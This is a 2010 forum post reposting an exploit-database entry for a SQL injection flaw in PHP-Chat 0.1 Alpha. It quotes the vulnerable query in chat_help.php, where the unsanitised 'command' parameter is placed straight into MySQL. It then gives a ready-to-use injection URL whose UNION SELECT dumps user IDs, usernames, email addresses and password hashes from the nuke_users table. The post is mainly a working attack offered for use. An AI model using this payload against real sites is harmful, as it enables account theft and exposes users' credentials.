ZeroCold Posted May 17, 2010 Report Share Posted May 17, 2010 PHP-Chat 0.1 Alpha SQL Injection/////////////////////////////////////////////////////////////////// R00TSECURITY.ORG - YOUR SECURITY COMMUNITY // - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -// [2009-09-22] PHP-Chat 0.1 Alpha SQL Injection// http://r00tsecurity.org/db/exploits/290// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -// GENERATED ON: 2009-12-01 | 00:46:38/////////////////////////////////////////////////////////////////EXPLOIT INFOPHP-Chat is based purely on PHP/MySQL which means I don\\\'t use any other technology such as Java or Javascript.The Chat will be released as both a stand-alone and a PHP-Nuke version.http://sourceforge.net/projects/php-chatThe exploit is located in the file chat_help.php where the $HTTP_GET_VARS[command] is passed directly to mysql without first sanitizing it []$query = \\\"SELECT * FROM `\\\" . $table_prefix . \\\"chathelp` WHERE `id` = \\\'$HTTP_GET_VARS[command]\\\' LIMIT 1\\\";$result = mysql_query($query) or die(\\\"$query failed!\\\");$row = mysql_fetch_row($result);[]EXPLOIThttp://www.site.com/php-chat/chat_help.php?command=-1\\\'+UNION+SELECT+1,concat(user_id,username,user_email,user_password),3,4+FROM+nuke_users/*// http://r00tsecurity.org/db/exploits/290 Quote Link to comment Share on other sites More sharing options...
